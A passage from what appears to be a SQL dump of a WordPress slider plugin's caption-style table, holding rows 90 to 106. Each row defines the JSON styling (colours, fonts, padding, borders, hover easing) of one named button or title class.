0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(90,'.tp-caption.NotGeneric-Menuitem','{\"hover\":\"true\",\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":\"0px 0px 0px 0px\",\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"27px 30px 27px 30px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.15\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(91,'.tp-caption.MarkerStyle','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"text-align\":\"left\",\"0\":\"\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"30px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"\\\"Permanent Marker\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(92,'.tp-caption.Gym-Menuitem','{\"hover\":\"true\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(93,'.tp-caption.Newspaper-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#FFFFFF\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"13px\",\"line-height\":\"17px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(94,'.tp-caption.Newspaper-Subtitle','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#a8d8ee\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(95,'.tp-caption.Newspaper-Title','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"50px\",\"line-height\":\"55px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Roboto Slab\\\"\",\"padding\":[\"0\",\"0\",\"10px\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(96,'.tp-caption.Newspaper-Title-Centered','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"50px\",\"line-height\":\"55px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Roboto Slab\\\"\",\"padding\":[\"0\",\"0\",\"10px\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"center\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(97,'.tp-caption.Hero-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(98,'.tp-caption.Video-Title','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"-20%\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(99,'.tp-caption.Video-SubTitle','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"12px\",\"line-height\":\"12px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0.35\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"-20%\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(100,'.tp-caption.NotGeneric-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(101,'.tp-caption.NotGeneric-BigButton','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"27px\",\"30px\",\"27px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.15\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(102,'.tp-caption.WebProduct-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#333333\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"2\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"16px\",\"line-height\":\"48px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0px\",\"40px\",\"0px\",\"40px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#333333\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"2\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(103,'.tp-caption.Restaurant-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffe081\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#0a0a0a\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(104,'.tp-caption.Gym-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#72a800\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"13px\",\"35px\",\"13px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#8bc027\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(105,'.tp-caption.Gym-Button-Light','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#72a800\",\"background-transparency\":\"0\",\"border-color\":\"#8bc027\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power2.inOut\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(106,'.tp-caption.Sports-Button-Light','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"500\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0